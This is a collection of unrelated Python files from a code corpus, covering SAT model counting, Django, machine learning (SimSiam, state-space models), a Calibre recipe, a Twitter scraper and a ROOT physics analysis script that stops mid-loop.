s.add(crash1.var == And(stng.vars.crash(e,i),Not(stng.vars.crash(e,i-1))))
s.add(crash2.var == And(stng.vars.crash(e,i),(stng.vars.crash(e,i-1))))
normalization_factor *= (magnification-p_crashes1)*p_crashes2
if output_range is not None:
return weight_vars,normalization_factor,magnification
else:
return weight_vars,normalization_factor
def wieghted_to_unweighted(stng,s,weight_vars,t,
p_omissions=0,p_crashes=0,p_delays=0):
assert p_delays == 0
denom = 1
if p_omissions<=0:
for e in stng.g.E:
s.add(Not(Or([stng.vars.omit(e,i) for i in range(t)])))
if p_crashes<=0:
for e in stng.g.E:
s.add(Not(Or([stng.vars.crash(e,i) for i in range(t)])))
if p_delays<=0:
for e in stng.g.E:
s.add(Not(Or([stng.vars.delay(e,i) for i in range(t)])))
for wv in weight_vars:
(bits,expo) = float_dec2bin(wv.weight)
cf = new_chain_formula(bits)
s.add(wv.var == cf)
denom *= 2**expo
return denom
def vaildate_exit_code(exit_code):
acceptable=[0,10,20]
if exit_code in acceptable:
return True
else:
return False
def run_bash(cmd,timeout=None):
print('cmd >>>',cmd)
if timeout is None:
exit_code = subprocess.call([cmd],shell=True)
if not vaildate_exit_code(exit_code) :
print("Exit Status error! status={}\nError cmd={}".format(exit_code,cmd))
return 'error'
else:
return 'success'
else:
temp_cmd_file = 'temp_cmd_file.txt'
temp_status = 'temp_status.txt'
save_to_file(cmd,temp_cmd_file)
cmd='python3 run_cmd_py3.py {} {} {}'.format(temp_cmd_file,temp_status,timeout)
run_bash(cmd)
return load_from_file(temp_status)
def run_mis(cnf_file,output_cnf_file):
'''
Find MIS of cnf_file and save to output_cnf_file
:return : 'timeout', 'success'
'''
start_t = time.time()
# Run MIS on file
cmd = 'cd mis/ && python MIS.py -output=../mis.out {}'.format('../'+cnf_file)
bash_output=run_bash(cmd,timeout=glbl_vars.timeout_limit)
print 'mis',bash_output
end_t=time.time()
run_time=end_t-start_t
# Check output status
if bash_output=='timeout':
print 'Timeout'
run_bash('./kill_mis.sh')
return 'timeout','timeout'
elif bash_output=='error':
return 'error','error'
else:
assert bash_output=='success'
with open("mis.out", "r") as f_temp:
c_ind = f_temp.read()
c_ind = "c ind {}".format(c_ind[2:])
with open("mis.out", "w") as f_temp:
f_temp.write(c_ind)
cmd = "cat {} >> {} && mv {} {}".format(cnf_file,'mis.out','mis.out',output_cnf_file)
run_bash(cmd)
return 'success',run_time
def run_approxMC(cnf_file,mis=False):
'''
Run cryptominsat (./scalmc) on cnf_file
:param mis: preprocess cnf_file to find MIS
:return : 'timeout', approximate number of SAT assignments
'''
# run MIS on file
if mis:
cnf_file_ind=cnf_file+'.ind'
return_status,mis_time = run_mis(cnf_file,cnf_file_ind)
if return_status == 'timeout':
return 'timeout'
else:
assert return_status=='success'
approxMC_input = cnf_file_ind
else:
approxMC_input = cnf_file
start_t = time.time()
approxMC_output=approxMC_input+'.sol.approx'
# run approxMC on file
cmd = "./scalmc {} > {}".format(approxMC_input, approxMC_output)
bash_output=run_bash(cmd,timeout=glbl_vars.timeout_limit)
print 'approxMC',bash_output
end_t=time.time()
run_time=end_t-start_t
# Check output status
if bash_output=='timeout':
print 'Timeout'
run_bash('./kill_approxMC.sh')
return 'timeout','timeout'
# The exit codes returned by approxMC do not follow common convention
else:
# Process approxMC output to get #Sols/check for error
print "reading approxMC's output..."
numSols = process_approxMC_output(approxMC_output)
if numSols=='error':
run_bash('mkdir segmentation_faults')
run_bash('cp {} segmentation_faults/{}'.format(approxMC_input,approxMC_input))
return 'error','error'
else:
return numSols,run_time
def run_weightMC(cnf_file,sol_file):
start_t=time.time()
# run weightMC on file
cmd = "./weightmc {} > {}".format(cnf_file, sol_file)
bash_output=run_bash(cmd,timeout=glbl_vars.timeout_limit)
print 'weightMC',bash_output
end_t=time.time()
run_time=end_t-start_t
# Check output status
if bash_output=='timeout':
print 'Timeout'
run_bash('./kill_weightMC.sh')
return 'timeout','timeout'
# The exit codes returned by weightMC do not follow common convention
else:
# Process weightMC output to get #Sols/check for error
print "reading weightMC's output..."
numSols = process_weightMC_output(sol_file)
if numSols=='error':
run_bash('mkdir segmentation_faults')
run_bash('cp {} segmentation_faults/{}'.format(cnf_file,cnf_file))
return 'error','error'
else:
return numSols,run_time
def run_sharpSAT(cnf_file,sol_file,return_time=False):
'''
Run sharpSAT on cnf_file, save output to sol_file
:return : 'timeout', exact number of SAT assignments
'''
# Run SharpSat on file
cmd = "./sharpSAT {} > {}".format(cnf_file, sol_file)
bash_output=run_bash(cmd,timeout=glbl_vars.timeout_limit)
print 'sharpSAT',bash_output
# Check output status
if bash_output=='timeout':
print 'Timeout'
run_bash('./kill_sharpsat.sh')
if return_time:
return 'timeout','timeout'
else:
return 'timeout'
elif bash_output=='error':
if return_time:
return 'error','error'
else:
return 'error'
else:
assert bash_output=='success'
# Process sharpSat output to get #Sols
print "reading SharpSat's output..."
numSols = process_sharpSat_output(sol_file,return_time=return_time)
return numSols
|
22,077 | 1e574bba7a33958ed18279e8fcf2ccede7f1b702 | # coding=utf-8
from cw_performance.speed_contest import SpeedContest
__author__ = 'Cezary Wagner'
__copyright__ = 'Copyright 2015-2018, Cezary K. Wagner.'
__license__ = 'Apache License 2.0'
__version__ = '1.0'
def init():
global x
x = 0
def simple_add():
global x
x = x + 1
def increment_add():
global x
x += 1
if __name__ == '__main__':
sc = SpeedContest()
sc.add_function(simple_add, init)
sc.add_function(increment_add, init)
sc.timeit_functions(verbose=True)
sc.repeat_functions(verbose=True)
|
22,078 | 34eba244be54eedba6d37cb59c7185fd9945595b | #
# @lc app=leetcode id=3 lang=python3
#
# [3] Longest Substring Without Repeating Characters
#
class Solution:
def lengthOfLongestSubstring(self, s: str) -> int:
if not s:
return 0
max_len = 1
last_idx = 0
for i in range(len(s)):
if s[i] in s[last_idx:i]:
if i-last_idx>max_len:
max_len = i-last_idx
last_idx = last_idx+s[last_idx:i].find(s[i])+1
return max(max_len,i-last_idx+1)
# if __name__ == "__main__":
# s = Solution()
# print(s.lengthOfLongestSubstring("pwwkew"))
|
22,079 | 2406ba9b8518b6e41230c9233077347caa9fce06 | # Generated by Django 2.2.5 on 2020-03-16 10:34
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('schedule', '0003_schoolevent'),
]
operations = [
migrations.AlterField(
model_name='schoolevent',
name='end_date',
field=models.DateTimeField(blank=True, null=True),
),
]
|
22,080 | fa83dfd7a3e7c8ed4b3c209f1c561c4a3025c9db | from model.tree import LabelNode
from model.tree import DecisionNode
def print_tree(decision_tree):
if isinstance(decision_tree, LabelNode):
print "============ LABEL ============"
print "Label:\t\t" + str(decision_tree.label)
print "Entropy:\t" + str(decision_tree.entropy)
print "==============================="
else:
print "========== DECISION ==========="
print "Split On:\t" + str(decision_tree.attribute)
print "Entropy:\t" + str(decision_tree.entropy)
print "==============================="
for subtree_key in decision_tree.subtrees:
print subtree_key
print_tree(decision_tree.subtrees[subtree_key])
|
22,081 | 045c124143663e1ca9ba61bf3f31b7c3114e1a7c | from django.conf.urls.defaults import *
from django.views.generic import DetailView, ListView
from coa.models import Account
from utils import *
urlpatterns = patterns('',
(r'^$',
ProtectedListView.as_view(
queryset=Account.objects.order_by('category', 'accno'),
context_object_name='accounts_list',
template_name='coa/index.html')),
(r'^accounts/$', 'coa.views.account_edit'),
(r'^accounts/(?P<account_id>\d+)/$', 'coa.views.account_edit'),
url(r'^(?P<pk>\d+)/delete/$',
ProtectedDetailView.as_view(
model=Account,
template_name='results.html'),
name='poll_results'),
# (r'^(?P<poll_id>\d+)/vote/$', 'coa.views.vote'),
)
|
22,082 | 32a53eb28c7829c2e061c9590ae7e00c6e369393 | import speech_recognition as sr
import webbrowser
print("welcome to my tools\n\n")
print("enter ur requirements .... We are listening ...",end='')
#ch=input()
r=sr.Recognizer()
with sr.Microphone() as source:
print('start saying..')
p= r.listen(source)
print('We got it .. Please Wait ..')
ch=r.recognize_google(p)
if ("date" in ch) and ("run" in ch) or ("execute" in ch):
webbrowser.open("http://192.168.0.107/cgi-bin/iiec.py?x=date")
elif "calender" in ch:
webbrowser.open("http://192.168.0.107/cgi-bin/iiec.py?x=cal")
else:
print("not understand")
|
22,083 | 40f3c80c7e71f086e531c67ecd6cce09916ad671 | # x='ajmal'
# for i in x:
# print(i)
# for i in range (1,500):
# if i%5!=0:
# print(i)
# import math
# for i in range (1,100):
# a=math.sqrt(i)
# if i%a==0:
# print(i)
# if int(a)**2==i:
# print(i)
# for i in range(1,20):
# if i%2!=0:
# print(i)
#for else telusko
|
22,084 | d8e4d453ac1646a967114b87aabeb89b082fff1b | # -*- coding: utf-8 -*-
# @Author: ruian2, kelu2
# @Date: 2017-04-01 21:34:40
# @Last Modified by: Luke
# @Last Modified time: 2017-05-10 04:41:27
# import bpy
import pymesh
import numpy as np
import csv
#TODO You also need to update the colors in the csv color, each row corresponds to the color you want fill to that segment
#TODO The default fine name is colorscheme.csv
def gridGen(mesh_name):
mesh = pymesh.load_mesh(mesh_name)
mesh.enable_connectivity()
grid = {}
# print mesh.vertices
for v in range(len(mesh.vertices)):
grid[v] = list(mesh.get_vertex_adjacent_vertices(int(v)))
return grid
def alpha_blending(src, dest, alpha):
list = alpha * (src - dest) + dest
result = []
for i in list:
result.append(int(i))
return result
def color_vertices(obj, alpha, mesh_name, seg_number):
mesh = obj
vertices_colors = mesh.get_attribute("vertex_color")
counter = 0
redVal = 0
greenVal = 0
blueVal = 0
f = open("colorscheme.csv", "r")
color_csv = csv.reader(f)
for row in color_csv:
print counter
print seg_number
if seg_number-1 == counter:
redVal = row[0]
blueVal = row[1]
greenVal = row[2]
print redVal
print blueVal
print greenVal
counter += 1
for i in range(mesh.num_vertices):
if(np.array_equal(vertices_colors[i*3: i*3+3], np.array([251,247,240]))):
vertices_colors[0 + 3 * i] = redVal
vertices_colors[1 + 3 * i] = greenVal
vertices_colors[2 + 3 * i] = blueVal
vertices_colors[i*3: i*3+3] = alpha_blending(vertices_colors[i*3: i*3+3], np.array([251, 247, 240]), alpha[i])
# vertices_colors[i*3: i*3+3] = alpha_blending(vertices_colors[i*3: i*3+3], np.array([255,255,255]), alpha[i])
mesh.set_attribute("vertex_color", vertices_colors)
f.close()
def change_format(inputFileName, outputFileName):
file = open(inputFileName)
lines = []
for line in file:
lines.append(line)
# print lines
file.close()
num_vertices = int(lines[3][15:-1])
del lines[7]
lines.insert(7, "property uchar red\n")
lines.insert(8, "property uchar green\n")
lines.insert(9, "property uchar blue\n")
for i in range(13,num_vertices+13):
line_list = lines[i].split(" ")
del line_list[3]
new_line = " ".join(line_list)
del lines[i]
lines.insert(i, new_line)
file = open(outputFileName, "w")
for line in lines:
file.write(line)
file.close()
def get_mesh(mesh_name):
mesh = pymesh.load_mesh(mesh_name)
mesh.enable_connectivity()
# vertex color should be the initiated first to ensure multiple times coloring for the same model
mesh.add_attribute("vertex_color")
vertices_colors = np.zeros(3*mesh.num_vertices)
for i in range(mesh.num_vertices):
vertices_colors[i*3: i*3+3] = np.array([251,247,240])
mesh.set_attribute("vertex_color", vertices_colors)
return mesh
|
22,085 | d73ca2ce6667602ba624815eaacdaa0ba6157584 | # Extract all name=value pairs from a GET url and place them into a dictionary
#
# Example GET url: b"GET /?name1=0.07&name2=0.03&name3=0.13 HTTP/1.1\r\n"
#
def extract(request):
d = dict()
p = request.find(b"?")
if p != -1:
while True:
n_start = p + 1
n_end = request.find(b"=", n_start)
v_start = n_end + 1
p_space = request.find(b" ", v_start)
p_and = request.find(b"&", v_start)
v_end = p_space if p_and == -1 else min(p_space, p_and)
d[request[n_start:n_end].decode("utf-8")] = request[v_start:v_end].decode("utf-8")
p = v_end
p = request.find(b"&", p)
if p == -1:
break
return d
|
22,086 | e411ded4b0b09ed90a237f540a5664c08f631436 | import pandas as pd
import plot_nn
from plot_nn import plot_nn_fake
import numpy as np
from matplotlib import pyplot as plt
nu_max=np.arange(1980,3000,4)
for nu in range(nu_max.size):
path="/home/rakesh/Fake_Data/MultiTrip/Spec_numax_%d.csv"%nu_max[nu]
df=pd.read_csv(path)
plot_nn_fake(df)
plt.savefig("/home/rakesh/Plots/28Jan/Train/numax_%d.png"%nu_max[nu])
plt.close()
|
22,087 | 1f4f8e0381deff3ae9bd5348a166aa408f232418 |
"""nectarchain command line tools.
"""
|
22,088 | b3e133c7678fc9f7da939e1053abf7acdf7cb930 | #!/usr/bin/env python2
# vim:fileencoding=utf-8
from __future__ import unicode_literals, division, absolute_import, print_function
from calibre.web.feeds.news import BasicNewsRecipe
from datetime import date
import json
import urllib2
class AdvancedUserRecipe1473929478(BasicNewsRecipe):
server = "http://drbaumert/nwz"
title = 'Nordwest Zeitung'
__author__ = 'jhbruhn'
publication_type = 'newspaper'
oldest_article = 7
use_embedded_content = True
max_articles_per_feed = 100
auto_cleanup = False
auto_cleanup_keep = '//img[@class="image"]|//*[@class="unterzeile-ipad"]'
compress_news_images = True
masthead_url = server + '/masthead.gif'
year = str(date.today().isocalendar()[0])
month = str(date.today().month).zfill(2)
day = str(date.today().day).zfill(2)
cover_url = 'http://www.nwzonline.de/NWZ/ePaperIssue/epaper/NWZOnline/' + \
year + month + day + '/NWZ/Olde%20N/fp_Preview/1_H_PORTRAIT.jpg'
extra_css = """ .unterzeile-ipad {
font-size: 0.9em;
font-style: italic;
}
.headline {
font-size: 1.3em;
}
.p-ipad {
font-style: normal;
}
.vorspann-im-text-ipad {
font-style: italic;
}
.frage-ipad {
font-style: italic !important;
}
.antwort-ipad {
font-style: normal;
}
.name-ipad {
font-weight: 700;
font-style: bold !important;
text-transform: uppercase;
display: inline !important;
}
stichwort {
text-transform: uppercase !important;
}
.autor-ipad {
text-transform: uppercase;
}
.ortsmarke-ipad {
font-style: bold !important;
text-transform: uppercase;
display: inline-block !important;
}
.autorenkuerzel-ipad {
display: inline;
text-transform: uppercase;
}
.p-ipad {
font-style: normal !important;
}"""
def get_feeds(self):
sections = json.load(urllib2.urlopen(self.server + '/today/sections.json'))
feeds = []
for section in sections:
feeds.append((section, self.server + '/today/feed-' + section.replace(" ", "_").replace("&", "und") + '.xml'))
return feeds
|
22,089 | 62ee8280c9b7ce8ef33973355dadc4b380af3eaa | from setuptools import setup, find_packages
VERSION = '0.2.2'
with open("README.md", "r") as fh:
README = fh.read()
setup(
name="one-config",
version=VERSION,
description="A universally accessible config object that only has to be constructed once",
long_description=README,
long_description_content_type="text/markdown",
url="https://github.com/LiamConnell/one-config",
author="LiamConnell",
# author_email="",
license="MIT",
classifiers=[
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
],
packages=find_packages(exclude=('tests',)),
include_package_data=True,
install_requires=["PyYAML"],
# entry_points={
# "console_scripts": [
# "realpython=reader.__main__:main",
# ]
# },
) |
22,090 | d1979d6173310731ee4753d8efde641d2c032622 | # Decoder (Models)
import torch as t
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
from base_class import Decoder
from torch.autograd import Variable
class LDSDecoder(Decoder):
"""
Linear Gaussian State Space Model
Attributes:
m: dimension of hidden state space
n: dimension of observation space
S: length of series
C: matrix in \R^m \times \R^n observation matrix
R: matrix in \R^m \times \R^m governing variance of observations
A: matrix in \R^n \times \R^n latent statne transition matrix
Q: matrix in \R^n \times \R^n latent state innovation variance
"""
def __init__(self, **model_params):
super(LDSDecoder, self).__init__(model_params=model_params)
self.m = model_params['m']
self.n = model_params['n']
self.S = model_params['S']
self.A = nn.Parameter(t.from_numpy(model_params['A']).float())
self.LQ = nn.Parameter(t.from_numpy(
np.linalg.cholesky(model_params['Q'])
).float())
self.Q = t.matmul(self.LQ, t.t(self.LQ))
self.C = nn.Parameter(t.from_numpy(model_params['C']).float())
self.LR = nn.Parameter(t.from_numpy(
np.linalg.cholesky(model_params['R'])
).float())
self.R = t.matmul(self.LR, t.t(self.LR))
def predict_x(self, z):
x = t.zeros((z.shape[0], z.shape[1], self.n))
noise = t.distributions.Normal(t.zeros(self.m), self.LR)
for b in xrange(0, z.shape[0]):
for s in xrange(0, z.shape[1]):
eps = noise.sample()
x[b,s] = t.matmul(self.C, z[b, s]) + noise
return x
def loglike(self, x, z):
z = z.permute(1, 2, 0)
x = x.permute(1, 2, 0)
emit_dist = t.distributions.Normal(
t.matmul(self.C, z[0]), self.LR)
loglike = emit_dist.log_prob(x[0])
for s in xrange(1, self.S):
emit_dist = t.distributions.Normal(
t.matmul(self.C,z[s]), self.LR)
trans_dist = t.distributions.Normal(
t.matmul(self.A, z[s-1]), self.LQ)
p_emit = emit_dist.log_prob(x[s])
p_tran = trans_dist.log_prob(z[s])
loglike += p_emit + p_tran
return t.mean(loglike)
def generate_data(self, N):
A = np.array(self.A.data.tolist())
C = np.array(self.C.data.tolist())
Q = np.array(self.Q.data.tolist())
R = np.array(self.R.data.tolist())
Zs = [None] * N
Xs = [None] * N
for n in range(N):
z = np.zeros((self.S, self.m))
x = np.zeros((self.S, self.n))
z_prev = np.random.multivariate_normal(
mean = np.zeros(self.m),
cov = Q*2,
)
for s in range(0,self.S):
z_cur = np.random.multivariate_normal(
mean=np.dot(A, z_prev),
cov=Q,
)
x_cur = np.random.multivariate_normal(
mean=np.dot(C, z_cur),
cov=R,
)
z[s] = z_cur
x[s] = x_cur
z_prev = z_cur
Zs[n] = z
Xs[n] = x
Z = np.stack(Zs, axis=0)
X = np.stack(Xs, axis=0)
return X, Z
class SLDSDecoder(Decoder):
"""
Switching Linear Gaussian State Space Model
Attributes:
num_states: number of latent states
m: dimension of hidden state space
n: dimension of observation space
S: length of series
Pi: matrix in num_states by num_states discrete latent state transition matrix
A: matrix in num_states by n by n latent state transition matrix
Delta_Q: vector in num_states by n latent state innovation drift
Q: matrix in num_states by n by n latent state innovation variance
C: matrix in num_states by m by n observation matrix
R: matrix in num_states by m by m governing variance of observations
"""
def __init__(self, **model_params):
super(SLDSDecoder, self).__init__(model_params=model_params)
self.num_states = model_params['num_states']
self.m = model_params['m']
self.n = model_params['n']
self.S = model_params['S']
if self.m != 1 or self.n != 1:
raise NotImplementedError("n and m must be 1 (scalar x and z)")
self.Pi = nn.Parameter(t.from_numpy(model_params['Pi']).float())
self.A = nn.Parameter(t.from_numpy(model_params['A']).float())
self.Delta_Q = nn.Parameter(t.from_numpy(model_params['Delta_Q']).float())
self.Q = nn.Parameter(t.from_numpy(model_params['Q']).float())
self.C = nn.Parameter(t.from_numpy(model_params['C']).float())
self.R = nn.Parameter(t.from_numpy(model_params['R']).float())
def predict_x(self, z):
raise NotImplementedError()
def _forward_pass_batched(self, x, z):
z = z.permute(1, 2, 0)
x = x.permute(1, 2, 0)
prob_vector = Variable(
t.ones((self.num_states, x.shape[-1]))/self.num_states
)
log_constant = Variable(t.zeros(x.shape[-1]))
z_prev = Variable(t.zeros((self.n, x.shape[-1])), requires_grad=False)
for s in range(0, x.shape[0]):
z_cur = z[s]
x_cur = x[s]
# Log Pr(Y, X | X_prev)
logP_s = Variable(t.zeros((self.num_states, x.shape[-1])))
for k in range(self.num_states):
emit_dist = t.distributions.Normal(
t.matmul(self.C[k], z_cur), t.sqrt(self.R[k]))
trans_dist = t.distributions.Normal(
t.matmul(self.A[k], z_prev)+self.Delta_Q[k],
t.sqrt(self.Q[k]))
logP_s[k] = emit_dist.log_prob(x_cur) + trans_dist.log_prob(z_cur)
log_constant = log_constant + t.max(logP_s, dim=0)[0]
P_s = t.exp(logP_s - t.max(logP_s, dim=0)[0])
prob_vector = t.transpose(
t.matmul(t.transpose(prob_vector, 0,1), self.Pi), 0, 1,
)
prob_vector = prob_vector * P_s
log_constant = log_constant + t.log(t.sum(prob_vector, dim=0))
prob_vector = prob_vector/t.sum(prob_vector, dim=0)
z_prev = z_cur
return log_constant
def loglike(self, x, z):
loglike = self._forward_pass_batched(x, z)
return t.mean(loglike)
def generate_data(self, N):
Pi = np.array(self.Pi.data.tolist())
A = np.array(self.A.data.tolist())
Delta_Q = np.array(self.Delta_Q.data.tolist())
Q = np.array(self.Q.data.tolist())
C = np.array(self.C.data.tolist())
R = np.array(self.R.data.tolist())
Ws = [None] * N
Zs = [None] * N
Xs = [None] * N
for n in range(N):
w = np.zeros((self.S))
z = np.zeros((self.S, self.m))
x = np.zeros((self.S, self.n))
w_prev = random_categorical(
np.ones(self.num_states)/self.num_states,
)
z_prev = np.random.multivariate_normal(
mean = np.zeros(self.m),
cov = Q[w_prev]*2,
)
for s in range(0,self.S):
w_cur = random_categorical(Pi[w_prev])
z_cur = np.random.multivariate_normal(
mean=np.dot(A[w_cur], z_prev) + Delta_Q[w_cur],
cov=Q[w_cur],
)
x_cur = np.random.multivariate_normal(
mean=np.dot(C[w_cur], z_cur),
cov=R[w_cur],
)
w[s] = w_cur
z[s] = z_cur
x[s] = x_cur
w_prev = w_cur
z_prev = z_cur
Ws[n] = w
Zs[n] = z
Xs[n] = x
W = np.stack(Ws, axis=0)
Z = np.stack(Zs, axis=0)
X = np.stack(Xs, axis=0)
return X, Z, W
def random_categorical(pvals, size=None):
out = np.random.multinomial(n=1, pvals=pvals, size=size).dot(
np.arange(len(pvals)))
return int(out)
|
22,091 | 8c4964972aab2bcf9d96e7cd808d9312ea9a5c61 | class MyExcept (Exception) :
def end(self):
print(" 11 ")
if __name__ == '__main__':
try:
print(5/0)
raise MyExcept #自定义异常的出发条件
except MyExcept as e:#自定义异常
print(e)
e.end()
except ZeroDivisionError as e :
print(e)
print("除数为0异常")
except Exception as e :
print(e)
print("自定义异常继承的父类异常(最大异常)")
else:
print("程序完毕") |
22,092 | 0905a6f5e65ea18fdb2ed252d3ea0fc3170f8c8d |
from config import load_args
from transforms import baseline
from models import Encoder, Predictor, SimSiam, LinearClassifier
from schedulers import SimpleCosineDecayLR
from utils import accuracy, AverageMeter
import time
import os
import torch
from torch import nn, optim
from torchvision.datasets import CIFAR10
from torch.utils.data import Dataset, DataLoader
def supervised_train(train_set, test_set, device, args):
train_loader = DataLoader(train_set, batch_size=args.eval_batch_size, shuffle=True, num_workers=4)
test_loader = DataLoader(test_set, batch_size=args.eval_batch_size, shuffle=False, num_workers=4)
# load pre-trained model
encoder = Encoder(hidden_dim=args.proj_hidden, output_dim=args.proj_out)
predictor = Predictor(input_dim=args.proj_out, hidden_dim=args.pred_hidden, output_dim=args.pred_out)
simsiam = SimSiam(encoder, predictor)
state_dict = torch.load(os.path.join(args.checkpoint_dir, args.checkpoint_name))
simsiam.load_state_dict(state_dict['model_state_dict'])
# remove everything after the backbone and freeze the representations
model = simsiam.encoder.backbone
for param in model.parameters():
param.requires_grad = False
# add a classifier, which we will train
input_dim = model.output_dim
model.classifier = LinearClassifier(input_dim)
for param in model.classifier.parameters():
param.requires_grad = True
model.to(device)
optimizer = optim.SGD(filter(lambda p: p.requires_grad, model.parameters()),
lr=args.eval_base_lr*args.eval_batch_size/256.,
momentum=args.eval_momentum,
weight_decay=args.eval_weight_decay)
scheduler = SimpleCosineDecayLR(optimizer, start_epoch=args.init_eval_epoch, final_epoch=args.final_eval_epoch)
criterion = nn.CrossEntropyLoss()
loss_meter = AverageMeter('loss', time_unit='epoch', start_time=args.init_pretrain_epoch)
train_acc_meter = AverageMeter('train accuracy', time_unit='epoch', start_time=args.init_pretrain_epoch)
test_acc_meter = AverageMeter('test accuracy', time_unit='epoch', start_time=args.init_pretrain_epoch)
for epoch in range(args.init_eval_epoch, args.final_eval_epoch + 1, 1):
print('===Beginning epoch %s===' % epoch)
start = time.time()
for batch_id, (data, labels) in enumerate(train_loader):
data, labels = data.to(device), labels.to(device)
output = model(data)
loss = criterion(output, labels)
loss.backward()
optimizer.step()
loss_meter.update(loss.item())
model.zero_grad()
if batch_id % 10 == 0:
print('Batch %s of %s has loss=%.4f' % (batch_id, len(train_loader), loss.item()))
end = time.time()
elapsed = (end - start)
print('Epoch %s took %.2f seconds' % (epoch, elapsed))
scheduler.step()
train_acc = accuracy(model, train_loader, device)
test_acc = accuracy(model, test_loader, device)
train_acc_meter.update(train_acc)
test_acc_meter.update(test_acc)
print('For epoch %s, accuracy on training is %.2f%%, accuracy on test is %.2f%%' % (epoch, train_acc * 100., test_acc * 100.))
loss_meter.reset()
train_acc_meter.reset()
test_acc_meter.reset()
if (epoch % 5 == 0) or (epoch == args.final_eval_epoch):
torch.save({
'model_state_dict': model.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
'current_epoch': epoch,
'loss_meter': loss_meter,
'train_acc_meter': train_acc_meter,
'test_acc_meter': test_acc_meter,
'args': args,
}, os.path.join(args.checkpoint_dir, 'linear_' + args.checkpoint_name))
if __name__ == '__main__':
args = load_args()
train_set = CIFAR10(root='./data', train=True, download=True, transform=baseline(train=True))
test_set = CIFAR10(root='./data', train=False, download=True, transform=baseline(train=False))
use_cuda = torch.cuda.is_available()
device = torch.device("cuda:0" if use_cuda else "cpu")
supervised_train(train_set, test_set, device, args)
|
22,093 | bd78f7733e3da1b2eb1bb2829e7cfc74ac1f17bc | import requests
from selenium import webdriver
from bs4 import BeautifulSoup
import time
#Initializing Selenium
driver = webdriver.Firefox()
#List of Dates in YYYY-MM-DD format
dates = []
#Will Store the Tweets
data = []
#Generating Dates
for year in range(2015,2019):
for month in range(1,13):
for day in range(1,32):
date = "{}-{}-{}".format(year,month,day)
dates.append(date)
#Adding/Removing Dates
dates.append("2019-01-01")
dates = dates[310:]
#Main Method
for date in range(len(dates)-1):
#Twitter's Advanced Search for user @dog_rates and inbetween two dates
url = "https://twitter.com/search?l=&q=from%3Adog_rates%20since%3A{}%20until%3A{}&src=typd".format(dates[date],dates[date+1])
#Loads the webpage
driver.get(url)
time.sleep(.5)
#Variable to indicate if scrolling reached the bottom of the page
last_height = driver.execute_script("return document.body.scrollHeight")
#Scrolling to the bottom of the page
for a in range(30):
driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
time.sleep(1)
#if the current scroll height is the same as the last one, scrolling has stopped.
new_height = driver.execute_script("return document.body.scrollHeight")
if new_height == last_height:
break
last_height = new_height
#Creating BeautifulSoup object
soup = BeautifulSoup(driver.page_source,"html.parser")
#Getting Each Tweet's Text
for tweet in soup.find_all("p",class_="tweet-text"):
#Stopps picture url from being included in tweet text
try:
tweet.a.clear()
except:
pass
#Adding it to master list
data.append(tweet.text)
#Logging Information
print date,len(data)
#Quits Selenium
driver.quit()
#Saving Data
with open("data.txt",'w') as f:
for a in data:
f.write(a+"\n")
|
22,094 | 30697527c66f505a53660f392589917d035f17fa | from backpropagation.NNPrinter import show_neural_network
show_neural_network()
|
22,095 | 207a000c6234e47f95e80a20c1b95e9c6349d069 | import ROOT, math, helper, sys, lib, copy, pickle, os
# definig all the signal regions. here only by name
SRs = [
'B',
'wjets',
'ttjets',
'ttjets_ht200',
'ttjets_ht200met100',
'ttjets_ht300met100',
'ttjets_ht400met120'
]
if not 'loaded' in globals():
print 'loaded is not in globals'
global loaded
loaded = False
if not loaded:
ttjets_sl = helper.sample('ttjets_sl','../closureTest/ttjets_semi_closureOutput_SS.root' )
ttjets_fl = helper.sample('ttjets_fl','../closureTest/ttjets_full_closureOutput_SS.root' )
ttjets_ha = helper.sample('ttjets_ha','../closureTest/ttjets_hadronic_closureOutput_SS.root' )
singletop = helper.sample('singletop','../closureTest/singletop_closureOutput_SS.root' )
wjets = helper.sample('wjets' ,'../closureTest/wnjets_closureOutput_SS.root' )
rares = helper.sample('rares' ,'../closureTest/rares_closureOutput_SS.root')
#qcdmuenr = helper.sample('qcdmuenr' ,'../closureTest/qcdmuenr_closureOutput_SS.root')
# dyjets = helper.sample('dyjets' ,'../closureTest/dyjets_closureOutput.root' )
doublemu = helper.sample('doublemu' ,'../closureTest/doublemu_closureOutput_SS.root')
doubleel = helper.sample('doubleel' ,'../closureTest/doubleel_closureOutput_SS.root')
samples = [ rares, wjets, ttjets_fl, ttjets_sl, ttjets_ha, singletop, doublemu, doubleel]
#samples = [ ttjets_sl]
for sample in samples:
for sr in SRs:
sample.regions.append(helper.region(sample.name, sr))
for i in range(len(samples)):
f = 'samples/'+samples[i].name+'.pk'
if os.path.isfile(f):
f= open(f, 'rb')
print 'for sample', samples[i].name, 'file exists. loading', f
samples[i] = pickle.load(f)
samples[i].loaded = True
f.close()
doublemu = (x for x in samples if x.name == 'doublemu' ).next()
doubleel = (x for x in samples if x.name == 'doubleel' ).next()
ttjets_fl = (x for x in samples if x.name == 'ttjets_fl').next()
ttjets_sl = (x for x in samples if x.name == 'ttjets_sl').next()
ttjets_ha = (x for x in samples if x.name == 'ttjets_ha').next()
singletop = (x for x in samples if x.name == 'singletop').next()
#qcdmuenr = (x for x in samples if x.name == 'qcdmuenr' ).next()
rares = (x for x in samples if x.name == 'rares' ).next()
wjets = (x for x in samples if x.name == 'wjets' ).next()
#dyjets = (x for x in samples if x.name == 'dyjets' ).next()
samples = [ rares, wjets, ttjets_fl, ttjets_sl, ttjets_ha, singletop, doublemu, doubleel]
#samples = [ ttjets_sl]
trigger = 1
maxev = 10E20
for sample in samples:
print '--------------------------------------------'
print 'AT SAMPLE:', sample.name
print '--------------------------------------------'
if sample.loaded == True: continue
print 'loading sample', sample.name
for sr in sample.regions: ## initialize all the histograms for all the regions
i=0
## muons
sr.histos['muiso' ] = ROOT.TH1F('muIso_' +sr.name+'_'+sample.name, 'muIso_' +sr.name+'_'+sample.name, 40, 0., 1.0)
sr.histos['muisoTL' ] = ROOT.TH1F('muIsoTL_' +sr.name+'_'+sample.name, 'muIsoTL_' +sr.name+'_'+sample.name, 40, 0., 1.0)
sr.histos['muisoT' ] = ROOT.TH1F('muIsoT_' +sr.name+'_'+sample.name, 'muIsoT_' +sr.name+'_'+sample.name, 40, 0., 1.0)
